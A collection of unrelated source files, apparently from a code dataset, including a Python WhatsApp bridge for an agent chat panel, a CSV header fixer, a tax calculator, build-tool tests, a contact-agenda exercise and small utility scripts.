driver.get_battery_level()\n _wsp['numero'] = driver.get_phone_number()\n _wsp['accountDown'] = False\n socketIO.emit('change',_wsp)\n\n # Send messages old #\n oldMessges = Thread(target=getOldMessages)\n oldMessges.start()\n else:\n\n # Send inital data #\n _wsp = {}\n _wsp['whatsAppJoin'] = False\n _wsp['accountDown'] = False\n socketIO.emit('change',_wsp)\n\n driver = WhatsAPIDriver(profile=profiledir, client='remote', command_executor=selemiunIP)\n write_log('Socket-Info','Check if have cache')\n rember = Thread(target=rememberSession)\n rember.start()\n\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n errorSend(traceback.format_exc())\n\ndef on_disconnect(*args):\n write_log('Socket-Info','Connection end')\n\ndef on_reconnect(*args):\n write_log('Socket-Info','Connection reconnect')\n socketIO.emit('Auth',token)\n\n#####################################\n# Fuctions WhatsApp #\n#####################################\n\n# Get the codeQr and emit the id Name #\ndef on_getQr(*args):\n try:\n global driver\n if driver == None:\n driver = WhatsAPIDriver(profile=profiledir, client='remote', command_executor=selemiunIP)\n if driver.is_logged_in():\n write_log('Socket-Info','session started') \n socketIO.emit('change',{'whatsAppJoin':True,'accountDown':False})\n socketIO.emit('sendQr', {'socketId':args[0],'error':'The session is started'} )\n else:\n write_log('Socket-Info','go to qr')\n name = uuid4().hex+'.png'\n if os.path.exists(name): os.remove(name)\n driver.get_qr(name)\n write_log('Socket-Info','saving qr')\n shutil.move('./'+name,pathSource+name)\n write_log('Socket-Info','send qr')\n socketIO.emit('sendQr',{'socketId':args[0],'file':str(name)})\n on_waitLogin(args[0])\n except Exception as e:\n socketIO.emit('sendQr', {'socketId':args[0],'error':traceback.format_exc()} )\n write_log('Socket-Error',traceback.format_exc())\n errorSend(traceback.format_exc())\n \n# await for login in whatsApp #\ndef on_waitLogin(*args):\n try:\n global awaitLogin, driver\n if awaitLogin == None:\n awaitLogin = True\n driver.wait_for_login()\n\n # Save session #\n driver.save_firefox_profile()\n\n # Send change in account #\n _wsp = {}\n _wsp['whatsAppJoin'] = True\n _wsp['bateryLevel'] = driver.get_battery_level()\n _wsp['numero'] = driver.get_phone_number()\n _wsp['accountDown'] = False\n socketIO.emit('change',_wsp)\n \n # Send login success #\n socketIO.emit('receiverLogin',args[0])\n write_log('Socket-Info','session start')\n\n # Send the status of account in whatsApp # \n write_log('Socket-Info','Init event loop')\n loop = Thread(target=loopStatus)\n loop.start()\n\n # Send all messages unread #\n oldMessges = Thread(target=getOldMessages)\n oldMessges.start()\n\n # Suscribe to observable #\n driver.subscribe_new_messages(NewMessageObserver())\n\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n errorSend(traceback.format_exc())\n awaitLogin = False\n\n# started loop whats send status account #\ndef loopStatus():\n try:\n global wsp\n while driver != None:\n time.sleep(60)\n write_log('Socket-Info','Send account info')\n if driver.is_logged_in():\n _wsp = {}\n _wsp['whatsAppJoin'] = driver.is_logged_in()\n _wsp['bateryLevel'] = driver.get_battery_level()\n _wsp['numero'] = driver.get_phone_number()\n _wsp['accountDown'] = False\n socketIO.emit('change',_wsp)\n else:\n _wsp = {}\n _wsp['whatsAppJoin'] = driver.is_logged_in()\n _wsp['bateryLevel'] = driver.get_battery_level()\n _wsp['numero'] = driver.get_phone_number()\n _wsp['accountDown'] = False\n socketIO.emit('change',_wsp)\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n errorSend(traceback.format_exc())\n\n# Get all chats not read in the account ONLY in start session #\ndef getOldMessages():\n try:\n chats = {}\n write_log('Socket-Info','Get oldMessage')\n for chat in driver.get_chats_whit_messages():\n print(\"CHAT NUEVO\")\n print(chat.get('id'))\n print(\"5215566694159@c.us\")\n if chat.get('isGroup') != True:\n\n ############################################\n #### SE RETIRARA DEL CODIGO ESTA LINEA, ####\n #### TRABA LA EJECUCIÓN DEL PROGRAMA ####\n #### GAMA 2019-04-30 ####\n ############################################\n #driver.chat_load_earlier_messages(chat.get('id'))\n if chat.get('id') not in \"5215566694159@c.us\":\n chats[str(chat.get('id'))] = []\n _messages = driver.get_all_messages_in_chat(chat.get('id'),True)\n for message in _messages:\n chatId = message._js_obj.get('chat').get('id').get('_serialized')\n sendByMy = True if driver.get_phone_number() == message.sender.id else False\n body = {'chat':chatId,'message':'','type':False,'caption':False,'sendBy':sendByMy}\n if message.type == 'image':\n body['message'] = str(message.save_media(pathSource,True))\n body['type'] = 'image'\n body['caption'] = message.caption\n elif message.type == 'video':\n body['message'] = str(message.save_media(pathSource,True))\n body['type'] = 'video'\n body['caption'] = message.caption\n elif message.type == 'document':\n body['message'] = str(message.save_media(pathSource,True))\n body['type'] = 'file'\n body['caption'] = message.caption\n elif message.type == 'audio' or message.type == 'ptt':\n content = str(message.save_media(pathSource,True))\n os.rename(content, content+'.ogg')\n body['message'] = content\n body['type'] = 'ogg'\n elif message.type == 'chat':\n body['message'] = message.content\n else :\n body['message'] = 'No soportado'\n\n chats[chatId].append(body)\n else:\n write_log('Socket-Info','Message of group')\n ##############################################\n #### SE RETIRARA DEL CODIGO ESTA FUNCION, ####\n #### TRABA LA EJECUCIÓN DEL PROGRAMA ####\n #### GAMA 2019-04-30 ####\n ##############################################\n #outGroup = Thread(target=exitGroup,args=(chat.get('id'),))\n #outGroup.start()\n\n socketIO.emit('oldMessages',chats)\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n errorSend(traceback.format_exc())\n\n# Remember session #\ndef rememberSession():\n global driver\n try:\n\n driver.wait_for_login(40)\n\n if driver.is_logged_in():\n # Send account info #\n write_log('Socket-Info','Send account info')\n _wsp = {}\n _wsp['whatsAppJoin'] = driver.is_logged_in()\n _wsp['bateryLevel'] = driver.get_battery_level()\n _wsp['numero'] = driver.get_phone_number()\n _wsp['accountDown'] = False\n socketIO.emit('change',_wsp)\n\n # Send messages old # \n oldMessges = Thread(target=getOldMessages)\n oldMessges.start()\n\n # Send the status of account in whatsApp # \n write_log('Socket-Info','Init event loop')\n loop = Thread(target=loopStatus)\n loop.start()\n\n # Suscribe to observable #\n driver.subscribe_new_messages(NewMessageObserver())\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n errorSend(traceback.format_exc())\n\ndef exitGroup(idChat):\n global driver\n try:\n write_log('Socket-Info','Exit group')\n driver.exit_group(idChat)\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n errorSend(traceback.format_exc())\n\ndef on_sendText(*args):\n try:\n id = args[0][0]\n message = args[0][1]\n write_log('Socket-Error','Send Message')\n\n send = Thread(target=sendText,args=(id,message))\n send.start()\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n errorSend(traceback.format_exc())\n\ndef sendText(id,message):\n try:\n driver.send_message_to_id(id,message)\n driver.mark_read(id)\n socketIO.emit('newMessage',{'chat':id,'message':message,'sendBy':'Agent'})\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n socketIO.emit('errorSendTxt',{'chat':id,'message':message,'sendBy':'Agent'})\n errorSend(traceback.format_exc())\n\ndef on_sendFile(*args):\n try:\n write_log('Socket-Error','Send File')\n id = args[0][0]\n caption = args[0][1]\n typeMessage = args[0][2]\n fileMessage = args[0][3]\n send = Thread(target=sendFile,args=(id,caption,typeMessage,fileMessage))\n send.start()\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n socketIO.emit('errorSendFile',{'chat':id,'message':caption,'sendBy':'Agent'})\n errorSend(traceback.format_exc())\n\ndef sendFile(id,caption,typeMessage,fileMessage):\n try:\n write_log('Socket-Error','Sending File')\n driver.send_media(pathSource+fileMessage,id,caption)\n driver.mark_read(id)\n write_log('Socket-Error','Send File end')\n socketIO.emit('newMessage',{'chat':id,'message':fileMessage,'type':typeMessage,'caption':caption,'sendBy':'Agent'})\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n socketIO.emit('errorSendFile',{'chat':id,'message':caption,'sendBy':'Agent'})\n errorSend(traceback.format_exc())\n\ndef on_deleteChat(*args):\n try:\n print(args[0])\n write_log('Socket-Error','Delete Chat'+str(args[0]))\n delChat = Thread(target=delete,args=(args[0],))\n delChat.start()\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n errorSend(traceback.format_exc())\n\ndef delete(id):\n try:\n write_log('Socket-Error','Delete Chat'+str(id))\n driver.delete_chat(str(id))\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n errorSend(traceback.format_exc())\n\n\n#####################################\n# Chat Functions #\n#####################################\n\n# Receive info for the account is change #\ndef on_matchUpdate(*args):\n try:\n global wsp\n wsp = args[0]\n print(wsp)\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n errorSend(traceback.format_exc())\n\n\n#####################################\n# Admin Functions #\n#####################################\n\n# Send error to serverSocket \ndef errorSend(error):\n socketIO.emit('clientError',[wsp['token'],error])\n\n# Send screenShoot to admin in BK#\ndef on_giveScreen(*args):\n try:\n _screen = Thread(target=screen,args=(args[0],))\n _screen.start()\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n errorSend(traceback.format_exc())\n socketIO.emit('sendScreen', {'socketId':args[0],'error':traceback.format_exc()} )\n\ndef screen(id):\n try:\n if driver != None:\n write_log('Socket-Info','go to screen'+id)\n name = uuid4().hex+'.png'\n if os.path.exists(name): os.remove(name)\n driver.screenshot(name)\n write_log('Socket-Info','saving screen')\n shutil.move('./'+name,pathSource+name)\n socketIO.emit('sendScreen',{'socketId':id,'file':str(name)})\n else:\n socketIO.emit('sendScreen', {'socketId':id,'error':'Browser not connected'} )\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n errorSend(traceback.format_exc())\n socketIO.emit('sendScreen', {'socketId':id,'error':traceback.format_exc()} )\n\n##########################\n# OBSERVABLE #\n##########################\nclass NewMessageObserver:\n def on_message_received(self, new_messages):\n for message in new_messages:\n if message.sender.id not in \"5215566694159@c.us\":\n if message.type == 'chat':\n write_log('Socket-Info',\"New message '{}' received from number {}\".format(message.type, message.sender.id))\n socketIO.emit('newMessage',{'chat':message.sender.id,'message':message.content})\n else:\n write_log('Socket-Info',\"New message of type '{}' received from number {}\".format(message.type, message.sender.id))\n if message.type == 'image':\n content = str(message.save_media(pathSource,True))\n socketIO.emit('newMessage',{'chat':message.sender.id,'message':content,'type':'image','caption':message.caption})\n elif message.type == 'video':\n content = str(message.save_media(pathSource,True))\n socketIO.emit('newMessage',{'chat':message.sender.id,'message':content,'type':'video','caption':message.caption})\n elif message.type == 'document':\n content = str(message.save_media(pathSource,True))\n socketIO.emit('newMessage',{'chat':message.sender.id,'message':content,'type':'file','caption':message.caption})\n elif message.type == 'audio' or message.type == 'ptt':\n content = str(message.save_media(pathSource,True))\n os.rename(content, content+'.ogg')\n socketIO.emit('newMessage',{'chat':message.sender.id,'message':content+'.ogg','type':'ogg','caption':message.caption})\n else:\n socketIO.emit('newMessage',{'chat':message.sender.id,'message':'Contenido No soportado'})\n\n\n##### SOCKET LISSENER #####\nsocketIO.on('connect', on_connect)\nsocketIO.on('welcome', on_welcome)\nsocketIO.on('reconnect', on_reconnect)\nsocketIO.on('getQr',on_getQr)\nsocketIO.on('matchUpdate',on_matchUpdate)\nsocketIO.on('giveScreen',on_giveScreen)\nsocketIO.on('sendText',on_sendText)\nsocketIO.on('sendFile',on_sendFile)\nsocketIO.on('deleteChat',on_deleteChat)\n\nsocketIO.wait()\n\n\n# def on_sendFile(*args):\n# try:\n# id = args[0][0]\n# caption = args[0][1]\n# typeMessage = args[0][2]\n# fileMessage = args[0][3]\n# send = Thread(target=sendFile,args=(id,caption,typeMessage,fileMessage))\n# send.start()\n# except Exception as e:\n# write_log('Socket-Error',traceback.format_exc())\n# socketIO.emit('errorSendFile',{'chat':id,'message':caption,'sendBy':'Agent'})\n# errorSend(traceback.format_exc())","sub_path":"init_v21.py","file_name":"init_v21.py","file_ext":"py","file_size_in_byte":17285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"405651524","text":"\"\"\"\n*******************************************************\n * Copyright (C) 2017 MindsDB Inc. \n *\n * This file is part of MindsDB Server.\n *\n * MindsDB Server can not be copied and/or distributed without the express\n * permission of MindsDB Inc\n *******************************************************\n\"\"\"\n\nimport csv\nimport sys\nimport traceback\n\nfrom mindsdb.libs.data_types.mindsdb_logger import log\n\n\ndef fixFileIfPossible(filepath):\n \"\"\"\n Tries to fix a file header if it finds header or encoding issues\n :param filepath: the filepath to fix if possible\n :return: fixed, error\n \"\"\"\n fixed = False\n error = False\n rows = []\n try:\n with open(filepath, newline='') as f:\n reader = csv.reader(f)\n header = None\n max_len = 0\n for row in reader:\n if header is None:\n header = row\n for i, col in enumerate(row):\n if col in [None, '']:\n fixed = True\n header[i] = 'col_{i}'.format(i=i+1)\n rows += [row]\n length = int(len(row))\n if length > max_len:\n max_len = length\n log.info(max_len)\n except:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n error = traceback.format_exception(exc_type, exc_value,\n exc_traceback)\n return fixed, error\n if len(header) < max_len or fixed == True:\n rightCell = lambda h, i: 'col_{i}'.format(i=i+1) if i > len(header) else h\n row = [rightCell(header_col, i) for i, header_col in enumerate(header)]\n rows[0] = row\n\n with open(filepath, 'w', newline='') as f:\n writer = csv.writer(f)\n writer.writerows(rows)\n\n return fixed, error\n\ndef test():\n log.info(fixFileIfPossible('/Users/jorge/Downloads/tweets (1).csv'))\n\n# only run the test if this file is called from debugger\nif __name__ == \"__main__\":\n test()\n","sub_path":"mindsdb/libs/helpers/file_helpers.py","file_name":"file_helpers.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"615472853","text":"#!/usr/bin/env python3\n\nimport sys\nlist = []\ndict = {}\nfor arg in sys.argv[1:]:\n try:\n list.append(arg.split(':')[0])\n dict[arg.split(':')[0]] = int(arg.split(':')[1])\n except ValueError:\n print(\"Parameter Error\")\n\ndef getPostTaxWage(wage):\n qcd = 0\n rate = 0\n wage_tax_val = wage - wage * (0.08 + 0.02 + 0.005 + 0.06) - 3500\n if wage_tax_val > 80000:\n rate = 0.45\n qcd = 13505\n elif wage_tax_val >= 55000:\n rate = 0.35\n qcd = 5505\n elif wage_tax_val >= 35000:\n rate = 0.3\n qcd = 2755\n elif wage_tax_val >= 9000:\n rate = 0.25\n qcd = 1005\n elif wage_tax_val >= 4500:\n rate = 0.2\n qcd = 555\n elif wage_tax_val >= 1500:\n rate = 0.1\n qcd = 105\n else:\n rate = 0.03\n qcd = 0\n\n tax = wage_tax_val * rate - qcd\n if tax <= 0:\n return wage - wage * (0.08 + 0.02 + 0.005 + 0.06) \n else:\n return wage - tax - wage * (0.08 + 0.02 + 0.005 + 0.06) \n\nfor k in list:\n print(k+':'+format(getPostTaxWage(dict[k]), \".2f\"))\n","sub_path":"better_calculator.py","file_name":"better_calculator.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"446800839","text":"import os\nimport py\n\ndef test_clean_build_dir(qibuild_action):\n world_proj = qibuild_action.add_test_project(\"world\")\n qibuild_action(\"configure\", \"world\")\n qibuild_action(\"clean\", \"world\")\n assert os.path.exists(world_proj.build_directory)\n qibuild_action(\"clean\", \"-f\", \"world\")\n assert not os.path.exists(world_proj.build_directory)\n\ndef test_only_clean_one_build_dir(qibuild_action, toolchains):\n build_worktree = qibuild_action.build_worktree\n qibuild_action.add_test_project(\"world\")\n world_proj = build_worktree.get_build_project(\"world\")\n toolchains.create(\"foo\")\n qibuild_action(\"configure\", \"world\")\n qibuild_action(\"configure\", \"-c\", \"foo\", \"world\")\n\n qibuild_action(\"clean\", \"-f\", \"-c\", \"foo\", \"-a\")\n assert os.path.exists(world_proj.build_directory)\n build_worktree.set_active_config(\"foo\")\n assert not os.path.exists(world_proj.build_directory)\n\ndef test_cleaning_all_build_dirs(qibuild_action, toolchains):\n build_worktree = qibuild_action.build_worktree\n build_config = build_worktree.build_config\n world_proj = qibuild_action.add_test_project(\"world\")\n toolchains.create(\"foo\")\n qibuild_action(\"configure\", \"world\")\n qibuild_action(\"configure\", \"-c\", \"foo\", \"world\")\n qibuild_action(\"configure\", \"--release\", \"-c\", \"foo\", \"world\")\n\n qibuild_action(\"clean\", \"-fz\", \"world\")\n assert not os.path.exists(world_proj.build_directory)\n build_worktree.set_active_config(\"foo\")\n assert not os.path.exists(world_proj.build_directory)\n build_config.build_type = \"Release\"\n assert not os.path.exists(world_proj.build_directory)\n\n\ndef test_clean_profiles(qibuild_action, toolchains, interact):\n build_worktree = qibuild_action.build_worktree\n build_worktree.configure_build_profile(\"a\", [(\"A\", \"ON\")])\n build_worktree.configure_build_profile(\"b\", [(\"B\", \"ON\")])\n toolchains.create(\"foo\")\n world_proj = qibuild_action.add_test_project(\"world\")\n # pylint: disable-msg=E1101\n world_path = py.path.local(world_proj.path)\n build_foo_a = world_path.ensure(\"build-foo-a\", dir=True)\n build_foo_b = world_path.ensure(\"build-foo-b\", dir=True)\n build_foo_a_b = world_path.ensure(\"build-foo-a-b\", dir=True)\n build_foo_c = world_path.ensure(\"build-foo-c\", dir=True)\n qibuild_action(\"clean\", \"-z\", \"--all\", \"--force\")\n assert build_foo_a.check(dir=False)\n assert build_foo_b.check(dir=False)\n assert build_foo_a_b.check(dir=False)\n assert build_foo_c.check(dir=True)\n interact.answers = [True]\n qibuild_action(\"clean\", \"-x\", \"--all\", \"--force\")\n assert build_foo_c.check(dir=False)\n","sub_path":"python/qibuild/test/test_qibuild_clean.py","file_name":"test_qibuild_clean.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"581681034","text":"# -*- coding: utf-8 -*-\n#Se debera generar un sistema que mantenga en memoria datos de una agenda.\n# - El programa mostrara las opciones> agregar, editar, borrar, mostrar y salir\n# agregar, agenda un contacto (email, telefono, nombre, domicilio, edad y dni)\n# editar, permite modificar cualquiera de los contactos seleccionando su email.\n# borrar, elimina un contacto.\n\nfrom time import sleep\n\n\"\"\"\n muestro el menú de la agenda de contactos con las opciones\n\"\"\"\ndef mostrarMenu():\n print(\"*****************************\")\n print(\"*** Agenda de Contactos *****\")\n print(\"*****************************\")\n print(\" \")\n print(\"OPCIONES\")\n print(\" --> Agregar (1) \")\n print(\" --> Editar (2) \")\n print(\" --> Borrar (3) \")\n print(\" --> Mostrar (4) \")\n print(\" --> Salir (5) \")\n print(\" \")\n return int(input(\"Ingrese alguna opción: \"))\n\n\"\"\"\n retorno un diccionario de persona cargado\n\"\"\"\ndef cargarPersona():\n dicPersona = {}\n print(\" \")\n dicPersona[\"email\"] = raw_input(\"Ingrese Email: \")\n dicPersona[\"telefono\"] = raw_input(\"Ingrese Telefono: \")\n dicPersona[\"nombre\"] = raw_input(\"Ingrese Nombre: \")\n dicPersona[\"domicilio\"] = raw_input(\"Ingrese Domicilio: \")\n dicPersona[\"edad\"] = raw_input(\"Ingrese Edad: \")\n dicPersona[\"dni\"] = raw_input(\"Ingrese DNI: \")\n return dicPersona\n\n\"\"\"\n muestro los contactos contenidos dentro de la lista\n\"\"\"\ndef mostrarContactos(listaAgenda):\n print(\" \")\n print(\"Contactos Disponibles \" + str(len(listaAgenda)))\n #recorre la lista\n for contacto in listaAgenda:\n print(\"Nombre: \" + contacto[\"nombre\"] + \" Email: \" + contacto[\"email\"])\n\n\nif __name__ == \"__main__\":\n flagSalida = False\n listaAgenda = []\n dicPersona = {}\n\n while(flagSalida==False):\n opciones = mostrarMenu()\n #agregar\n if opciones == 1:\n dicPersona = cargarPersona()\n listaAgenda.append(dicPersona)\n #editar\n elif opciones == 2:\n mostrarContactos(listaAgenda)\n print(\" \")\n email = raw_input(\"Ingrese un email: \")\n\n for contactos in listaAgenda:\n if email in contactos[\"email\"]:\n contactos = cargarPersona()\n else:\n print(\"No existe el email ingresado.\")\n #borrar\n elif opciones == 3:\n mostrarContactos(listaAgenda)\n print(\" \")\n email = raw_input(\"Ingrese un email: \")\n\n for contactos in listaAgenda:\n if email in contactos[\"email\"]:\n listaAgenda.remove(contactos)\n else:\n print(\"No existe el email ingresado.\")\n #mostrar\n elif opciones == 4:\n mostrarContactos(listaAgenda)\n sleep(2)\n else:\n flagSalida = True\n","sub_path":"2.0-tipos-de-datos/ejercicios_alumnos/Zardain-Sergio/ej05.py","file_name":"ej05.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"100989897","text":"import os\nimport json\nimport time\nimport hashlib\nimport discord\nfrom discord.ext import commands\nfrom gtts import gTTS\nfrom configobj import ConfigObj\n\noptions = ConfigObj('config/options.ini')\nwith open('../manifest.json') as j: manifest = json.load(j)\n\ndef restrict_to_admin():\n def is_admin(ctx):\n perms = ctx.author.guild_permissions\n if perms.administrator == True:\n return True \n else:\n return False\n return commands.check(is_admin)\n\ndef restrict_to_owner():\n def is_owner(ctx):\n if ctx.author.id == 199312062164369408:\n return True \n else:\n return False\n return commands.check(is_owner)\n\ndef md5(string:str):\n m = hashlib.md5()\n m.update(string.encode('utf-8'))\n return m.hexdigest()\n\nclass CommandsManager:\n\n async def getall():\n commands = []\n for root, dirs, files in os.walk(\"commands/\"):\n if '__pycache__' in dirs:\n dirs.remove('__pycache__')\n for filename in files:\n if '.py' in str(filename):\n commands.append(str(filename).replace('.py',''))\n return commands\n \n async def load(bot):\n commands = await CommandsManager.getall()\n for command in commands:\n bot.load_extension('commands.{}'.format(command))\n print('{} commands were loaded.'.format(str(len(commands))))\n\n async def unload(bot):\n commands = await CommandsManager.getall()\n for command in commands:\n bot.unload_extension('commands.{}'.format(command))\n print('{} commands were unloaded.'.format(str(len(commands))))\n\n\nclass TTSManager:\n\n async def build(text:str, language='es'):\n if not TTSManager.exists(text,language):\n hashed = md5(text+language)\n speech = gTTS(text, lang=language)\n path = f'rsrc/tts/{hashed}.mp3'\n speech.save(path)\n return path\n\n def to_speech(text:str, language='es'):\n speech = gTTS(text, lang=language)\n return speech\n\n def exists(text:str,lang:str):\n hashed = md5(text+lang)\n check = os.path.isdir(f'rsrc/tts/{hashed}.mp3')\n if check: return True \n else: return False\n\n\n\n ","sub_path":"src/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"196261487","text":"class Solution(object):\n def zigzagLevelOrder(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n result = []\n if root != None:\n result.append([root])\n while result != []:\n prev_level = result[-1]\n result_level = []\n for node in prev_level:\n if node.left != None:\n result_level.append(node.left)\n if node.right != None:\n result_level.append(node.right)\n if result_level != []:\n result.append(result_level)\n else:\n break\n final_result = []\n LTR = 1\n for row in result:\n if LTR:\n final_result.append([n.val for n in row])\n else:\n final_result.append([n.val for n in row[::-1]])\n LTR = 0 if LTR else 1\n return final_result\n\n\n\n\n\n\n\n","sub_path":"BinTreeZigZag.py","file_name":"BinTreeZigZag.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"170438019","text":"import os, sys,time\n\nbase_path = '/nokia/be_nmp/groups/msg_touch_wa/xulliang/'\ncd_path = 's40_ui/s40_msg/msg_platform/appls/'\n#cd_path = 's40_ui/time_mgmt/'\nsrc_path = 's40_sw'\n\ndef get_all_build_path(p):\n r = []\n f = os.listdir(p)\n for ele in f:\n path = os.path.join(p, ele)\n if os.path.isdir(path) and ele != src_path:\n r.append(ele)\n return r\n\ndef write_multi_path(p):\n open(\"/disk1/xulliang/quick_cd.txt\",\"w\").write(\",\".join((p,str(time.time()))))\n\ndef get_multi_path_log():\n if os.path.exists(\"/disk1/xulliang/quick_cd.txt\"): \n a = open(\"/disk1/xulliang/quick_cd.txt\",\"r\").readline()\n return a.strip().split(\",\")\n return [None,None]\n \ndef ret_path(cur_path, param):\n use_multibuild = \"no\" \n if param[0] == \"bdyes\":\n args = \"bd\"\n use_multibuild = \"yes\" \n else:\n args = param[0]\n\n #open(\"/disk1/xulliang/a.txt\", \"w\").write(use_multibuild)\n if cur_path.startswith(base_path):\n n = cur_path[len(base_path):].split(\"/\")\n if len(n) >= 1:\n proj_path = n[0]\n else:\n return base_path\n build_path = \"\"\n if len(n) > 1: # the current path include build path\n if n[1] != src_path:\n build_path = n[1]\n #open(\"/disk1/xulliang/a.txt\", \"w\").write(proj_path+build_path+use_multibuild)\n else: \n return \".\"\n open(\"/disk1/xulliang/a.txt\", \"w\").write(\"return .\")\n\n if args.lower() == \"bd\":\n \"\"\" go to the build path of msg \"\"\"\n paths = get_all_build_path(os.path.join(base_path, proj_path))\n\n if build_path and use_multibuild == \"no\":\n #open(\"/disk1/xulliang/a.txt\", \"w\").write(os.path.join(base_path,proj_path,build_path,cd_path))\n return os.path.join(base_path,proj_path,build_path,cd_path)\n\n if paths and len(paths) == 1:\n return os.path.join(base_path,proj_path,paths[0],cd_path)\n else:#more than 1 build path here\n# print(\"bd, more than 1 build path\")\n p,t = get_multi_path_log()\n r = \".\"\n find = -1\n if p and t:\n for i in range(len(paths)):\n# print(time.time(), float(t), time.time()-float(t))\n if paths[i] == os.path.split(p)[1] and time.time() - float(t) < 10.0:\n find = i\n break\n if find > -1:\n if find == len(paths)-1:\n r = os.path.join(base_path,proj_path, paths[0]) \n else:\n r = os.path.join(base_path,proj_path, paths[find+1])\n else:\n r = os.path.join(base_path,proj_path, paths[0]) \n if r != \".\":\n write_multi_path(r)\n return os.path.join(r,cd_path)\n elif args.lower() == 'src':\n \"\"\" go to the src path of msg\"\"\"\n return os.path.join(base_path,proj_path,src_path,cd_path)\n elif args.lower() == 'proj':\n \"\"\"go to the project path\"\"\"\n return os.path.join(base_path,proj_path)\n\n return \".\"\n\ndef change_evo_path(cur_path, param):\n path_apps = \"resources/apps\"\n path_view = \"resources/view/evo/apps\"\n path_out = \"out\"\n path_yapas = \"yapas\"\n if cur_path.find(path_yapas) != -1:\n if param == \"apps\":\n return os.path.join(cur_path.split(path_yapas)[0], path_yapas, path_apps)\n elif param == \"view\":\n return os.path.join(cur_path.split(path_yapas)[0], path_yapas, path_view)\n elif param == \"out\":\n return os.path.join(cur_path.split(path_yapas)[0], path_yapas, path_out)\n return \".\"\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n cur_path = os.getcwd()\n #open(\"/disk1/xulliang/a.txt\", \"w\").write(sys.argv[1])\n #print(ret_path(cur_path, sys.argv[1:]))\n print(change_evo_path(cur_path, sys.argv[1]))\n else:\n #open(\"/disk1/xulliang/a.txt\", \"w\").write(\"error\")\n print(base_path)\n","sub_path":"py/quick_cd.py","file_name":"quick_cd.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"162304152","text":"from django.conf.urls import patterns, url\nfrom . import views\n\nurlpatterns = patterns('',\n\t\t\t\turl(r'^$', views.index, name='index'),\n\t\t\t\turl(r'^manual/$', views.manual, name='manual'),\n\t\t\t\turl(r'^delete_member/$', views.delete_member, name = 'delete_member'),\n\t\t\t\turl(r'^restore_member/$', views.restore_member, name = 'restore_member'),\n\t\t\t\t# url(r'^update_member/$', views.update_member, name = 'update_member'),\n\t\t\t\turl(r'^search_names/$', views.search_names, name='search_names'),\n\t\t\t\turl(r'^update_form/$', views.update_form, name='update_form'),\n\t\t\t\turl(r'^view_cert/$', views.view_cert, name='view_cert'),\n\t\t\t\turl(r'^trash/$', views.trash, name='trash'),\n\t\t\t\turl(r'^recycle_bin/$', views.recycle_bin, name='recycle_bin'),\n\t\t\t\turl(r'^messages/$', views.messages, name='messages'),\n\t\t\t)","sub_path":"django-manipulation/data_mining/list/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"123926277","text":"\"\"\"Helper functions, temporarily named this way.\"\"\"\nimport numpy as np\nimport sys\n\n\ndef getnodedata(self, nl_p=None):\n \"\"\"\n Get all data from all nodes listed in the input.\n\n Input is a nodelist_bn object.\n Output is a list of dictionaries.\n \"\"\"\n nodedata = []\n if not nl_p:\n nl_p = self.getnetnodes()\n\n nnodes = self.lengthnodelist(nl_p)\n for idx in range(nnodes):\n node_p = self.nthnode(nl_p, idx)\n nodenamestr = self.getnodename(node_p)\n nstates = self.getnodenumberstates(node_p)\n isdiscrete = self.getnodetype(node_p) != 1\n if isdiscrete:\n nodelevels = [self.getnodestatename(node_p, state=i)\n for i in np.arange(nstates)]\n expval = (None, None)\n else:\n nodelevels = self.getnodelevels(node_p)\n expval = self.getnodeexpectedvalue(node_p)\n prob_bn = self.getnodebeliefs(node_p)\n nodedata.append({'name': nodenamestr,\n 'discrete': isdiscrete,\n 'expval': expval,\n 'nstates': nstates,\n 'levels': nodelevels,\n 'probs': prob_bn})\n return nodedata\n\n\ndef ccharp(inpstr):\n \"\"\"Make sure input strings are c_char_p bytes objects.\"\"\"\n # https://stackoverflow.com/questions/23852311/different-behaviour-of-ctypes-c-char-p # noqa\n if sys.version_info < (3, 0) or 'bytes' in str(type(inpstr)):\n outstr = inpstr\n else:\n outstr = inpstr.encode('utf-8')\n return outstr\n","sub_path":"netica/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"364859328","text":"#!/usr/bin/env python3\n\"\"\"ELF/MC front panel 